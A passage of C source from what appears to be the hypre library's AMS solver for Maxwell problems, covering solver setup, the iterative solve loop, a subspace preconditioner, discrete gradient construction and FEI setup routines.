HYPRE_BoomerAMGSetPMaxElmts(ams_data -> B_Pi, ams_data -> B_Pi_Pmax);
HYPRE_BoomerAMGSetMinCoarseSize(ams_data -> B_Pi, 2); /* don't coarsen to 0 */
/* Generally, don't use exact solve on the coarsest level (matrix may be singular) */
HYPRE_BoomerAMGSetCycleRelaxType(ams_data -> B_Pi, ams_data -> B_Pi_coarse_relax_type, 3);
if (ams_data -> cycle_type == 0)
HYPRE_BoomerAMGSetMaxLevels(ams_data -> B_Pi, 2);
/* If not given, construct the coarse space matrix by RAP and
notify BoomerAMG that this is a dim x dim block system. */
if (!ams_data -> A_Pi)
{
HYPRE_Int P_owned_col_starts = hypre_ParCSRMatrixOwnsColStarts(ams_data -> Pi);
if (!hypre_ParCSRMatrixCommPkg(ams_data -> Pi))
hypre_MatvecCommPkgCreate(ams_data -> Pi);
if (!hypre_ParCSRMatrixCommPkg(ams_data -> A))
hypre_MatvecCommPkgCreate(ams_data -> A);
if (ams_data -> cycle_type == 9)
{
/* Add a discrete divergence term to A before computing Pi^t A Pi */
{
hypre_ParCSRMatrix *Gt, *GGt, *ApGGt;
hypre_ParCSRMatrixTranspose(ams_data -> G, &Gt, 1);
hypre_ParCSRMatrixOwnsColStarts(Gt) = 0;
hypre_ParCSRMatrixOwnsRowStarts(Gt) = 0;
/* scale GGt by h^2 */
{
HYPRE_Real h2;
HYPRE_Int i, j, k, ne;
hypre_CSRMatrix *Gt_diag = hypre_ParCSRMatrixDiag(Gt);
HYPRE_Int Gt_num_rows = hypre_CSRMatrixNumRows(Gt_diag);
HYPRE_Int *Gt_diag_I = hypre_CSRMatrixI(Gt_diag);
HYPRE_Int *Gt_diag_J = hypre_CSRMatrixJ(Gt_diag);
HYPRE_Real *Gt_diag_data = hypre_CSRMatrixData(Gt_diag);
hypre_CSRMatrix *Gt_offd = hypre_ParCSRMatrixOffd(Gt);
HYPRE_Int *Gt_offd_I = hypre_CSRMatrixI(Gt_offd);
HYPRE_Real *Gt_offd_data = hypre_CSRMatrixData(Gt_offd);
HYPRE_Real *Gx_data = hypre_VectorData(hypre_ParVectorLocalVector(ams_data -> Gx));
HYPRE_Real *Gy_data = hypre_VectorData(hypre_ParVectorLocalVector(ams_data -> Gy));
HYPRE_Real *Gz_data = hypre_VectorData(hypre_ParVectorLocalVector(ams_data -> Gz));
for (i = 0; i < Gt_num_rows; i++)
{
/* determine the characteristic mesh size for vertex i */
h2 = 0.0;
ne = 0;
for (j = Gt_diag_I[i]; j < Gt_diag_I[i+1]; j++)
{
k = Gt_diag_J[j];
h2 += Gx_data[k]*Gx_data[k]+Gy_data[k]*Gy_data[k]+Gz_data[k]*Gz_data[k];
ne++;
}
if (ne != 0)
{
h2 /= ne;
for (j = Gt_diag_I[i]; j < Gt_diag_I[i+1]; j++)
Gt_diag_data[j] *= h2;
for (j = Gt_offd_I[i]; j < Gt_offd_I[i+1]; j++)
Gt_offd_data[j] *= h2;
}
}
}
/* we only needed Gx, Gy and Gz to compute the local mesh size */
if (input_info == 1)
{
hypre_ParVectorDestroy(ams_data -> Gx);
hypre_ParVectorDestroy(ams_data -> Gy);
if (ams_data -> dim == 3)
hypre_ParVectorDestroy(ams_data -> Gz);
}
GGt = hypre_ParMatmul(ams_data -> G, Gt);
hypre_ParCSRMatrixDestroy(Gt);
/* hypre_ParCSRMatrixAdd(GGt, A, &ams_data -> A); */
hypre_ParcsrAdd(1.0, GGt, 1.0, ams_data -> A, &ApGGt);
/*{
hypre_ParCSRMatrix *A = GGt;
hypre_ParCSRMatrix *B = ams_data -> A;
hypre_ParCSRMatrix **C_ptr = &ApGGt;
hypre_ParCSRMatrix *C;
hypre_CSRMatrix *A_local, *B_local, *C_local;
MPI_Comm comm = hypre_ParCSRMatrixComm(A);
HYPRE_BigInt global_num_rows = hypre_ParCSRMatrixGlobalNumRows(A);
HYPRE_BigInt global_num_cols = hypre_ParCSRMatrixGlobalNumCols(A);
HYPRE_BigInt *row_starts = hypre_ParCSRMatrixRowStarts(A);
HYPRE_BigInt *col_starts = hypre_ParCSRMatrixColStarts(A);
HYPRE_Int A_num_cols_offd = hypre_CSRMatrixNumCols(hypre_ParCSRMatrixOffd(A));
HYPRE_Int A_num_nonzeros_diag = hypre_CSRMatrixNumNonzeros(hypre_ParCSRMatrixDiag(A));
HYPRE_Int A_num_nonzeros_offd = hypre_CSRMatrixNumNonzeros(hypre_ParCSRMatrixOffd(A));
HYPRE_Int B_num_cols_offd = hypre_CSRMatrixNumCols(hypre_ParCSRMatrixOffd(B));
HYPRE_Int B_num_nonzeros_diag = hypre_CSRMatrixNumNonzeros(hypre_ParCSRMatrixDiag(B));
HYPRE_Int B_num_nonzeros_offd = hypre_CSRMatrixNumNonzeros(hypre_ParCSRMatrixOffd(B));
A_local = hypre_MergeDiagAndOffd(A);
B_local = hypre_MergeDiagAndOffd(B);
C_local = hypre_CSRMatrixBigAdd(A_local, B_local);
hypre_CSRMatrixBigJtoJ(C_local);
C = hypre_ParCSRMatrixCreate (comm,
global_num_rows,
global_num_cols,
row_starts,
col_starts,
A_num_cols_offd + B_num_cols_offd,
A_num_nonzeros_diag + B_num_nonzeros_diag,
A_num_nonzeros_offd + B_num_nonzeros_offd);
GenerateDiagAndOffd(C_local, C,
hypre_ParCSRMatrixFirstColDiag(A),
hypre_ParCSRMatrixLastColDiag(A));
hypre_ParCSRMatrixOwnsRowStarts(C) = 0;
hypre_ParCSRMatrixOwnsColStarts(C) = 0;
hypre_CSRMatrixDestroy(A_local);
hypre_CSRMatrixDestroy(B_local);
hypre_CSRMatrixDestroy(C_local);
*C_ptr = C;
}*/
hypre_ParCSRMatrixDestroy(GGt);
hypre_BoomerAMGBuildCoarseOperator(ams_data -> Pi,
ApGGt,
ams_data -> Pi,
&ams_data -> A_Pi);
}
}
else
{
hypre_BoomerAMGBuildCoarseOperator(ams_data -> Pi,
ams_data -> A,
ams_data -> Pi,
&ams_data -> A_Pi);
}
if (!P_owned_col_starts)
{
hypre_ParCSRMatrixOwnsRowStarts(ams_data -> A_Pi) = 0;
hypre_ParCSRMatrixOwnsColStarts(ams_data -> A_Pi) = 0;
}
ams_data -> owns_A_Pi = 1;
if (ams_data -> cycle_type != 20)
HYPRE_BoomerAMGSetNumFunctions(ams_data -> B_Pi, ams_data -> dim);
else
HYPRE_BoomerAMGSetNumFunctions(ams_data -> B_Pi, ams_data -> dim + 1);
/* HYPRE_BoomerAMGSetNodal(ams_data -> B_Pi, 1); */
}
/* Make sure that A_Pi has no zero rows (this can happen for
some kinds of boundary conditions with contact). */
hypre_ParCSRMatrixFixZeroRows(ams_data -> A_Pi);
HYPRE_BoomerAMGSetup(ams_data -> B_Pi,
(HYPRE_ParCSRMatrix)ams_data -> A_Pi,
0, 0);
}
/* Allocate temporary vectors */
ams_data -> r0 = hypre_ParVectorInRangeOf(ams_data -> A);
ams_data -> g0 = hypre_ParVectorInRangeOf(ams_data -> A);
if (ams_data -> A_G)
{
ams_data -> r1 = hypre_ParVectorInRangeOf(ams_data -> A_G);
ams_data -> g1 = hypre_ParVectorInRangeOf(ams_data -> A_G);
}
if (ams_data -> r1 == NULL && ams_data -> A_Pix)
{
ams_data -> r1 = hypre_ParVectorInRangeOf(ams_data -> A_Pix);
ams_data -> g1 = hypre_ParVectorInRangeOf(ams_data -> A_Pix);
}
if (ams_data -> Pi)
{
ams_data -> r2 = hypre_ParVectorInDomainOf(ams_data -> Pi);
ams_data -> g2 = hypre_ParVectorInDomainOf(ams_data -> Pi);
}
return hypre_error_flag;
}
/*--------------------------------------------------------------------------
* hypre_AMSSolve
*
* Solve the system A x = b.
*--------------------------------------------------------------------------*/
HYPRE_Int hypre_AMSSolve(void *solver,
hypre_ParCSRMatrix *A,
hypre_ParVector *b,
hypre_ParVector *x)
{
hypre_AMSData *ams_data = (hypre_AMSData *) solver;
HYPRE_Int i, my_id = -1;
HYPRE_Real r0_norm, r_norm, b_norm, relative_resid = 0, old_resid;
char cycle[30];
hypre_ParCSRMatrix *Ai[5], *Pi[5];
HYPRE_Solver Bi[5];
HYPRE_PtrToSolverFcn HBi[5];
hypre_ParVector *ri[5], *gi[5];
hypre_ParVector *z = NULL;
Ai[0] = ams_data -> A_G; Pi[0] = ams_data -> G;
Ai[1] = ams_data -> A_Pi; Pi[1] = ams_data -> Pi;
Ai[2] = ams_data -> A_Pix; Pi[2] = ams_data -> Pix;
Ai[3] = ams_data -> A_Piy; Pi[3] = ams_data -> Piy;
Ai[4] = ams_data -> A_Piz; Pi[4] = ams_data -> Piz;
Bi[0] = ams_data -> B_G; HBi[0] = (HYPRE_PtrToSolverFcn) hypre_BoomerAMGSolve;
Bi[1] = ams_data -> B_Pi; HBi[1] = (HYPRE_PtrToSolverFcn) hypre_BoomerAMGBlockSolve;
Bi[2] = ams_data -> B_Pix; HBi[2] = (HYPRE_PtrToSolverFcn) hypre_BoomerAMGSolve;
Bi[3] = ams_data -> B_Piy; HBi[3] = (HYPRE_PtrToSolverFcn) hypre_BoomerAMGSolve;
Bi[4] = ams_data -> B_Piz; HBi[4] = (HYPRE_PtrToSolverFcn) hypre_BoomerAMGSolve;
ri[0] = ams_data -> r1; gi[0] = ams_data -> g1;
ri[1] = ams_data -> r2; gi[1] = ams_data -> g2;
ri[2] = ams_data -> r1; gi[2] = ams_data -> g1;
ri[3] = ams_data -> r1; gi[3] = ams_data -> g1;
ri[4] = ams_data -> r1; gi[4] = ams_data -> g1;
/* may need to create an additional temporary vector for relaxation */
if (hypre_NumThreads() > 1 || ams_data -> A_relax_type == 16)
{
z = hypre_ParVectorCreate(hypre_ParCSRMatrixComm(A),
hypre_ParCSRMatrixGlobalNumRows(A),
hypre_ParCSRMatrixRowStarts(A));
hypre_ParVectorInitialize(z);
hypre_ParVectorSetPartitioningOwner(z,0);
}
if (ams_data -> print_level > 0)
hypre_MPI_Comm_rank(hypre_ParCSRMatrixComm(A), &my_id);
/* Compatible subspace projection for problems with zero-conductivity regions.
Note that this modifies the input (r.h.s.) vector b! */
if ( (ams_data -> B_G0) &&
(++ams_data->solve_counter % ( ams_data -> projection_frequency ) == 0) )
{
/* hypre_printf("Projecting onto the compatible subspace...\n"); */
hypre_AMSProjectOutGradients(ams_data, b);
}
if (ams_data -> beta_is_zero)
{
switch (ams_data -> cycle_type)
{
case 0:
hypre_sprintf(cycle,"%s","0");
break;
case 1:
case 3:
case 5:
case 7:
default:
hypre_sprintf(cycle,"%s","020");
break;
case 2:
case 4:
case 6:
case 8:
hypre_sprintf(cycle,"%s","(0+2)");
break;
case 11:
case 13:
hypre_sprintf(cycle,"%s","0345430");
break;
case 12:
hypre_sprintf(cycle,"%s","(0+3+4+5)");
break;
case 14:
hypre_sprintf(cycle,"%s","0(+3+4+5)0");
break;
}
}
else
{
switch (ams_data -> cycle_type)
{
case 0:
hypre_sprintf(cycle,"%s","010");
break;
case 1:
default:
hypre_sprintf(cycle,"%s","01210");
break;
case 2:
hypre_sprintf(cycle,"%s","(0+1+2)");
break;
case 3:
hypre_sprintf(cycle,"%s","02120");
break;
case 4:
hypre_sprintf(cycle,"%s","(010+2)");
break;
case 5:
hypre_sprintf(cycle,"%s","0102010");
break;
case 6:
hypre_sprintf(cycle,"%s","(020+1)");
break;
case 7:
hypre_sprintf(cycle,"%s","0201020");
break;
case 8:
hypre_sprintf(cycle,"%s","0(+1+2)0");
break;
case 9:
hypre_sprintf(cycle,"%s","01210");
break;
case 11:
hypre_sprintf(cycle,"%s","013454310");
break;
case 12:
hypre_sprintf(cycle,"%s","(0+1+3+4+5)");
break;
case 13:
hypre_sprintf(cycle,"%s","034515430");
break;
case 14:
hypre_sprintf(cycle,"%s","01(+3+4+5)10");
break;
case 20:
hypre_sprintf(cycle,"%s","020");
break;
}
}
for (i = 0; i < ams_data -> maxit; i++)
{
/* Compute initial residual norms */
if (ams_data -> maxit > 1 && i == 0)
{
hypre_ParVectorCopy(b, ams_data -> r0);
hypre_ParCSRMatrixMatvec(-1.0, ams_data -> A, x, 1.0, ams_data -> r0);
r_norm = sqrt(hypre_ParVectorInnerProd(ams_data -> r0,ams_data -> r0));
r0_norm = r_norm;
b_norm = sqrt(hypre_ParVectorInnerProd(b, b));
if (b_norm)
relative_resid = r_norm / b_norm;
else
relative_resid = r_norm;
if (my_id == 0 && ams_data -> print_level > 0)
{
hypre_printf(" relative\n");
hypre_printf(" residual factor residual\n");
hypre_printf(" -------- ------ --------\n");
hypre_printf(" Initial %e %e\n",
r_norm, relative_resid);
}
}
/* Apply the preconditioner */
hypre_ParCSRSubspacePrec(ams_data -> A,
ams_data -> A_relax_type,
ams_data -> A_relax_times,
ams_data -> A_l1_norms ? hypre_VectorData(ams_data -> A_l1_norms) : NULL,
ams_data -> A_relax_weight,
ams_data -> A_omega,
ams_data -> A_max_eig_est,
ams_data -> A_min_eig_est,
ams_data -> A_cheby_order,
ams_data -> A_cheby_fraction,
Ai, Bi, HBi, Pi, ri, gi,
b, x,
ams_data -> r0,
ams_data -> g0,
cycle,
z);
/* Compute new residual norms */
if (ams_data -> maxit > 1)
{
old_resid = r_norm;
hypre_ParVectorCopy(b, ams_data -> r0);
hypre_ParCSRMatrixMatvec(-1.0, ams_data -> A, x, 1.0, ams_data -> r0);
r_norm = sqrt(hypre_ParVectorInnerProd(ams_data -> r0,ams_data -> r0));
if (b_norm)
relative_resid = r_norm / b_norm;
else
relative_resid = r_norm;
if (my_id == 0 && ams_data -> print_level > 0)
hypre_printf(" Cycle %2d %e %f %e \n",
i+1, r_norm, r_norm / old_resid, relative_resid);
}
if (relative_resid < ams_data -> tol)
{
i++;
break;
}
}
if (my_id == 0 && ams_data -> print_level > 0 && ams_data -> maxit > 1)
hypre_printf("\n\n Average Convergence Factor = %f\n\n",
pow((r_norm/r0_norm),(1.0/(HYPRE_Real) i)));
ams_data -> num_iterations = i;
ams_data -> rel_resid_norm = relative_resid;
if (ams_data -> num_iterations == ams_data -> maxit && ams_data -> tol > 0.0)
hypre_error(HYPRE_ERROR_CONV);
if (z)
hypre_ParVectorDestroy(z);
return hypre_error_flag;
}
/*--------------------------------------------------------------------------
* hypre_ParCSRSubspacePrec
*
* General subspace preconditioner for A0 y = x, based on ParCSR storage.
*
* P[i] and A[i] are the interpolation and coarse grid matrices for
* the (i+1)'th subspace. B[i] is an AMG solver for A[i]. r[i] and g[i]
* are temporary vectors. A0_* are the fine grid smoothing parameters.
*
* The default mode is multiplicative, '+' changes the next correction
* to additive, based on residual computed at '('.
*--------------------------------------------------------------------------*/
HYPRE_Int hypre_ParCSRSubspacePrec(/* fine space matrix */
hypre_ParCSRMatrix *A0,
/* relaxation parameters */
HYPRE_Int A0_relax_type,
HYPRE_Int A0_relax_times,
HYPRE_Real *A0_l1_norms,
HYPRE_Real A0_relax_weight,
HYPRE_Real A0_omega,
HYPRE_Real A0_max_eig_est,
HYPRE_Real A0_min_eig_est,
HYPRE_Int A0_cheby_order,
HYPRE_Real A0_cheby_fraction,
/* subspace matrices */
hypre_ParCSRMatrix **A,
/* subspace preconditioners */
HYPRE_Solver *B,
/* hypre solver functions for B */
HYPRE_PtrToSolverFcn *HB,
/* subspace interpolations */
hypre_ParCSRMatrix **P,
/* temporary subspace vectors */
hypre_ParVector **r,
hypre_ParVector **g,
/* right-hand side */
hypre_ParVector *x,
/* current approximation */
hypre_ParVector *y,
/* current residual */
hypre_ParVector *r0,
/* temporary vector */
hypre_ParVector *g0,
char *cycle,
/* temporary vector */
hypre_ParVector *z)
{
char *op;
HYPRE_Int use_saved_residual = 0;
for (op = cycle; *op != '\0'; op++)
{
/* do nothing */
if (*op == ')')
continue;
/* compute the residual: r = x - Ay */
else if (*op == '(')
{
hypre_ParVectorCopy(x,r0);
hypre_ParCSRMatrixMatvec(-1.0, A0, y, 1.0, r0);
}
/* switch to additive correction */
else if (*op == '+')
{
use_saved_residual = 1;
continue;
}
/* smooth: y += S (x - Ay) */
else if (*op == '0')
{
hypre_ParCSRRelax(A0, x,
A0_relax_type,
A0_relax_times,
A0_l1_norms,
A0_relax_weight,
A0_omega,
A0_max_eig_est,
A0_min_eig_est,
A0_cheby_order,
A0_cheby_fraction,
y, g0, z);
}
/* subspace correction: y += P B^{-1} P^t r */
else
{
HYPRE_Int i = *op - '1';
if (i < 0)
hypre_error_in_arg(16);
/* skip empty subspaces */
if (!A[i]) continue;
/* compute the residual? */
if (use_saved_residual)
{
use_saved_residual = 0;
hypre_ParCSRMatrixMatvecT(1.0, P[i], r0, 0.0, r[i]);
}
else
{
hypre_ParVectorCopy(x,g0);
hypre_ParCSRMatrixMatvec(-1.0, A0, y, 1.0, g0);
hypre_ParCSRMatrixMatvecT(1.0, P[i], g0, 0.0, r[i]);
}
hypre_ParVectorSetConstantValues(g[i], 0.0);
(*HB[i]) (B[i], (HYPRE_Matrix)A[i],
(HYPRE_Vector)r[i], (HYPRE_Vector)g[i]);
hypre_ParCSRMatrixMatvec(1.0, P[i], g[i], 0.0, g0);
hypre_ParVectorAxpy(1.0, g0, y);
}
}
return hypre_error_flag;
}
/*--------------------------------------------------------------------------
* hypre_AMSGetNumIterations
*
* Get the number of AMS iterations.
*--------------------------------------------------------------------------*/
HYPRE_Int hypre_AMSGetNumIterations(void *solver,
HYPRE_Int *num_iterations)
{
hypre_AMSData *ams_data = (hypre_AMSData *) solver;
*num_iterations = ams_data -> num_iterations;
return hypre_error_flag;
}
/*--------------------------------------------------------------------------
* hypre_AMSGetFinalRelativeResidualNorm
*
* Get the final relative residual norm in AMS.
*--------------------------------------------------------------------------*/
HYPRE_Int hypre_AMSGetFinalRelativeResidualNorm(void *solver,
HYPRE_Real *rel_resid_norm)
{
hypre_AMSData *ams_data = (hypre_AMSData *) solver;
*rel_resid_norm = ams_data -> rel_resid_norm;
return hypre_error_flag;
}
/*--------------------------------------------------------------------------
* hypre_AMSProjectOutGradients
*
* For problems with zero-conductivity regions, project the vector onto the
* compatible subspace: x = (I - G0 (G0^t G0)^{-1} G0^T) x, where G0 is the
* discrete gradient restricted to the interior nodes of the regions with
* zero conductivity. This ensures that x is orthogonal to the gradients in
* the range of G0.
*
* This function is typically called after the solution iteration is complete,
* in order to facilitate the visualization of the computed field. Without it
* the values in the zero-conductivity regions contain kernel components.
*--------------------------------------------------------------------------*/
HYPRE_Int hypre_AMSProjectOutGradients(void *solver,
hypre_ParVector *x)
{
hypre_AMSData *ams_data = (hypre_AMSData *) solver;
if (ams_data -> B_G0)
{
hypre_ParCSRMatrixMatvecT(1.0, ams_data -> G0, x, 0.0, ams_data -> r1);
hypre_ParVectorSetConstantValues(ams_data -> g1, 0.0);
hypre_BoomerAMGSolve(ams_data -> B_G0, ams_data -> A_G0, ams_data -> r1, ams_data -> g1);
hypre_ParCSRMatrixMatvec(1.0, ams_data -> G0, ams_data -> g1, 0.0, ams_data -> g0);
hypre_ParVectorAxpy(-1.0, ams_data -> g0, x);
}
return hypre_error_flag;
}
/*--------------------------------------------------------------------------
* hypre_AMSConstructDiscreteGradient
*
* Construct and return the lowest-order discrete gradient matrix G, based on:
* - a matrix on the egdes (e.g. the stiffness matrix A)
* - a vector on the vertices (e.g. the x coordinates)
* - the array edge_vertex, which lists the global indexes of the
* vertices of the local edges.
*
* We assume that edge_vertex lists the edge vertices consecutively,
* and that the orientation of all edges is consistent. More specificaly:
* If edge_orientation = 1, the edges are already oriented.
* If edge_orientation = 2, the orientation of edge i depends only on the
* sign of edge_vertex[2*i+1] - edge_vertex[2*i].
*--------------------------------------------------------------------------*/
HYPRE_Int hypre_AMSConstructDiscreteGradient(hypre_ParCSRMatrix *A,
hypre_ParVector *x_coord,
HYPRE_BigInt *edge_vertex,
HYPRE_Int edge_orientation,
hypre_ParCSRMatrix **G_ptr)
{
hypre_ParCSRMatrix *G;
HYPRE_Int nedges;
nedges = hypre_ParCSRMatrixNumRows(A);
/* Construct the local part of G based on edge_vertex and the edge
and vertex partitionings from A and x_coord */
{
HYPRE_Int i, *I = hypre_CTAlloc(HYPRE_Int, nedges+1, HYPRE_MEMORY_HOST);
HYPRE_Int part_size;
HYPRE_BigInt *row_starts, *col_starts;
HYPRE_Real *data = hypre_CTAlloc(HYPRE_Real, 2*nedges, HYPRE_MEMORY_HOST);
hypre_CSRMatrix *local = hypre_CSRMatrixCreate (nedges,
hypre_ParVectorGlobalSize(x_coord),
2*nedges);
for (i = 0; i <= nedges; i++)
I[i] = 2*i;
if (edge_orientation == 1)
{
/* Assume that the edges are already oriented */
for (i = 0; i < 2*nedges; i+=2)
{
data[i] = -1.0;
data[i+1] = 1.0;
}
}
else if (edge_orientation == 2)
{
/* Assume that the edge orientation is based on the vertex indexes */
for (i = 0; i < 2*nedges; i+=2)
{
if (edge_vertex[i] < edge_vertex[i+1])
{
data[i] = -1.0;
data[i+1] = 1.0;
}
else
{
data[i] = 1.0;
data[i+1] = -1.0;
}
}
}
else
{
hypre_error_in_arg(4);
}
hypre_CSRMatrixI(local) = I;
hypre_CSRMatrixBigJ(local) = edge_vertex;
hypre_CSRMatrixData(local) = data;
hypre_CSRMatrixRownnz(local) = NULL;
hypre_CSRMatrixOwnsData(local) = 1;
hypre_CSRMatrixNumRownnz(local) = nedges;
/* Copy partitioning from A and x_coord (previously they were re-used) */
part_size = 2;
row_starts = hypre_TAlloc(HYPRE_BigInt, part_size, HYPRE_MEMORY_HOST);
col_starts = hypre_TAlloc(HYPRE_BigInt, part_size, HYPRE_MEMORY_HOST);
for (i = 0; i < part_size; i++)
{
row_starts[i] = hypre_ParCSRMatrixRowStarts(A)[i];
col_starts[i] = hypre_ParVectorPartitioning(x_coord)[i];
}
/* Generate the discrete gradient matrix */
G = hypre_ParCSRMatrixCreate(hypre_ParCSRMatrixComm(A),
hypre_ParCSRMatrixGlobalNumRows(A),
hypre_ParVectorGlobalSize(x_coord),
row_starts, col_starts, 0, 0, 0);
hypre_ParCSRMatrixOwnsRowStarts(G) = 1;
hypre_ParCSRMatrixOwnsColStarts(G) = 1;
hypre_CSRMatrixBigJtoJ(local);
GenerateDiagAndOffd(local, G,
hypre_ParVectorFirstIndex(x_coord),
hypre_ParVectorLastIndex(x_coord));
/* Account for empty rows in G. These may appear when A includes only
the interior (non-Dirichlet b.c.) edges. */
{
hypre_CSRMatrix *G_diag = hypre_ParCSRMatrixDiag(G);
G_diag->num_cols = hypre_VectorSize(hypre_ParVectorLocalVector(x_coord));
}
/* Free the local matrix */
hypre_CSRMatrixDestroy(local);
}
*G_ptr = G;
return hypre_error_flag;
}
/*--------------------------------------------------------------------------
* hypre_AMSFEISetup
*
* Construct an AMS solver object based on the following data:
*
* A - the edge element stiffness matrix
* num_vert - number of vertices (nodes) in the processor
* num_local_vert - number of vertices owned by the processor
* vert_number - global indexes of the vertices in the processor
* vert_coord - coordinates of the vertices in the processor
* num_edges - number of edges owned by the processor
* edge_vertex - the vertices of the edges owned by the processor.
* Vertices are in local numbering (the same as in
* vert_number), and edge orientation is always from
* the first to the second vertex.
*
* Here we distinguish between vertices that belong to elements in the
* current processor, and the subset of these vertices that is owned by
* the processor.
*
* This function is written specifically for input from the FEI and should
* be called before hypre_AMSSetup().
*--------------------------------------------------------------------------*/
HYPRE_Int hypre_AMSFEISetup(void *solver,
hypre_ParCSRMatrix *A,
hypre_ParVector *b,
hypre_ParVector *x,
HYPRE_Int num_vert,
HYPRE_Int num_local_vert,
HYPRE_BigInt *vert_number,
HYPRE_Real *vert_coord,
HYPRE_Int num_edges,
HYPRE_BigInt *edge_vertex)
{
hypre_AMSData *ams_data = (hypre_AMSData *) solver;
HYPRE_Int i, j;
hypre_ParCSRMatrix *G;
hypre_ParVector *x_coord, *y_coord, *z_coord;
HYPRE_Real *x_data, *y_data, *z_data;
MPI_Comm comm = hypre_ParCSRMatrixComm(A);
HYPRE_BigInt *vert_part, num_global_vert;
HYPRE_BigInt vert_start, vert_end;
HYPRE_BigInt big_local_vert = (HYPRE_BigInt) num_local_vert;
/* Find the processor partitioning of the vertices */
vert_part = hypre_TAlloc(HYPRE_BigInt, 2, HYPRE_MEMORY_HOST);
hypre_MPI_Scan(&big_local_vert, &vert_part[1], 1, HYPRE_MPI_BIG_INT, hypre_MPI_SUM, comm);
vert_part[0] = vert_part[1] - big_local_vert;
hypre_MPI_Allreduce(&big_local_vert, &num_global_vert, 1, HYPRE_MPI_BIG_INT, hypre_MPI_SUM, comm);
/* Construct hypre parallel vectors for the vertex coordinates */
x_coord = hypre_ParVectorCreate(comm, num_global_vert, vert_part);
hypre_ParVectorInitialize(x_coord);
hypre_ParVectorOwnsData(x_coord) = 1;
hypre_ParVectorOwnsPartitioning(x_coord) = 0;
x_data = hypre_VectorData(hypre_ParVectorLocalVector(x_coord));
y_coord = hypre_ParVectorCreate(comm, num_global_vert, vert_part);
hypre_ParVectorInitialize(y_coord);
hypre_ParVectorOwnsData(y_coord) = 1;
hypre_ParVectorOwnsPartitioning(y_coord) = 0;
y_data = hypre_VectorData(hypre_ParVectorLocalVector(y_coord));
z_coord = hypre_ParVectorCreate(comm, num_global_vert, vert_part);
hypre_ParVectorInitialize(z_coord);
hypre_ParVectorOwnsData(z_coord) = 1;
hypre_ParVectorOwnsPartitioning(z_coord) = 0;
z_data = hypre_VectorData(hypre_ParVectorLocalVector(z_coord));
vert_start = hypre_ParVectorFirstIndex(x_coord);
vert_end = hypre_ParVectorLastIndex(x_coord);
/* Save coordinates of locally owned vertices */
for (i = 0; i < num_vert; i++)
{
if (vert_number[i] >= vert_start && vert_number[i] <= vert_end)
{
j = (HYPRE_Int)(vert_number[i] - vert_start);
x_data[j] = vert_coord[3*i];
y_data[j] = vert_coord[3*i+1];
z_data[j] = vert_coord[3*i+2];
}
}
/* Change vertex numbers from local to global */
for (i = 0; i < 2*num_edges; i++)
edge_vertex[i] = vert_number[edge_vertex[i]];
/* Construct the local part of G based on edge_vertex */
{
/* HYPRE_Int num_edges = hypre_ParCSRMatrixNumRows(A); */
HYPRE_Int *I = hypre_CTAlloc(HYPRE_Int, num_edges+1, HYPRE_MEMORY_HOST);
HYPRE_Real *data = hypre_CTAlloc(HYPRE_Real, 2*num_edges, HYPRE_MEMORY_HOST);
hypre_CSRMatrix *local = hypre_CSRMatrixCreate (num_edges,
num_global_vert,
2*num_edges);
for (i = 0; i <= num_edges; i++)
I[i] = 2*i;
/* Assume that the edge orientation is based on the vertex indexes */
for (i = 0; i < 2*num_edges; i+=2)
{
data[i] = 1.0;
data[i+1] = -1.0;
}
hypre_CSRMatrixI(local) = I;
hypre_CSRMatrixBigJ(local) = edge_vertex;
hypre_CSRMatrixData(local) = data;
hypre_CSRMatrixRownnz(local) = NULL;
hypre_CSRMatrixOwnsData(local) = 1;
hypre_CSRMatrixNumRownnz(local) = num_edges;
G = hypre_ParCSRMatrixCreate(comm,
hypre_ParCSRMatrixGlobalNumRows(A),
num_global_vert,
hypre_ParCSRMatrixRowStarts(A),
vert_part,
0, 0, 0);
hypre_ParCSRMatrixOwnsRowStarts(G) = 0;
hypre_ParCSRMatrixOwnsColStarts(G) = 1;
hypre_CSRMatrixBigJtoJ(local);
GenerateDiagAndOffd(local, G, vert_start, vert_end);
//hypre_CSRMatrixJ(local) = NULL;
hypre_CSRMatrixDestroy(local);
}
ams_data -> G = G;
ams_data -> x = x_coord;
ams_data -> y = y_coord;
ams_data -> z = z_coord;
return hypre_error_flag;
}
/*--------------------------------------------------------------------------
* hypre_AMSFEIDestroy
*
* Free the additional memory allocated in hypre_AMSFEISetup().
*
* This function is written specifically for input from the FEI and should
* be called before hypre_AMSDestroy().
*--------------------------------------------------------------------------*/
HYPRE_Int hypre_AMSFEIDestroy(void *solver)
{
hypre_AMSData *ams_data = (hypre_AMSData *) solver;
if (ams_data -> G)
hypre_ParCSRMatrixDestroy(ams_data -> G);
if (ams_data -> x)
hypre_ParVectorDestroy(ams_data -> x);
if (ams_data -> y)
hypre_ParVectorDestroy(ams_data -> y);
if (ams_data -> z)
hypre_ParVectorDestroy(ams_data -> z);
return hypre_error_flag;
}
/*--------------------------------------------------------------------------
* hypre_ParCSRComputeL1Norms Threads
*
* Compute the l1 norms of the rows of a given matrix, depending on
* the option parameter:
*
* option 1 = Compute the l1 norm of the rows
* option 2 = Compute the l1 norm of the (processor) off-diagonal
* part of the rows plus the diagonal of A
* option 3 = Compute the l2 norm^2 of the rows
* option 4 = Truncated version of option 2 based on Remark 6.2 in "Multigrid
* Smoothers for Ultra-Parallel Computing"
*
* The above computations are done in a CF manner, whenever the provided
* cf_marker is not NULL.
*--------------------------------------------------------------------------*/
HYPRE_Int hypre_ParCSRComputeL1NormsThreads(hypre_ParCSRMatrix *A,
HYPRE_Int option,
HYPRE_Int num_threads,
HYPRE_Int *cf_marker,
HYPRE_Real **l1_norm_ptr)
{
HYPRE_Int i, j, k;
HYPRE_Int num_rows = hypre_ParCSRMatrixNumRows(A);
hypre_CSRMatrix *A_diag = hypre_ParCSRMatrixDiag(A);
HYPRE_Int *A_diag_I = hypre_CSRMatrixI(A_diag);
HYPRE_Int *A_diag_J = hypre_CSRMatrixJ(A_diag);
HYPRE_Real *A_diag_data = hypre_CSRMatrixData(A_diag);
hypre_CSRMatrix *A_offd = hypre_ParCSRMatrixOffd(A);
HYPRE_Int *A_offd_I = hypre_CSRMatrixI(A_offd);
HYPRE_Int *A_offd_J = hypre_CSRMatrixJ(A_offd);
HYPRE_Real *A_offd_data = hypre_CSRMatrixData(A_offd);
HYPRE_Int num_cols_offd = hypre_CSRMatrixNumCols(A_offd);
HYPRE_Real diag;
HYPRE_Real *l1_norm = hypre_TAlloc(HYPRE_Real, num_rows, hypre_ParCSRMatrixMemoryLocation(A));
HYPRE_Int ii, ns, ne, rest, size;
HYPRE_Int *cf_marker_offd = NULL;
HYPRE_Int cf_diag;
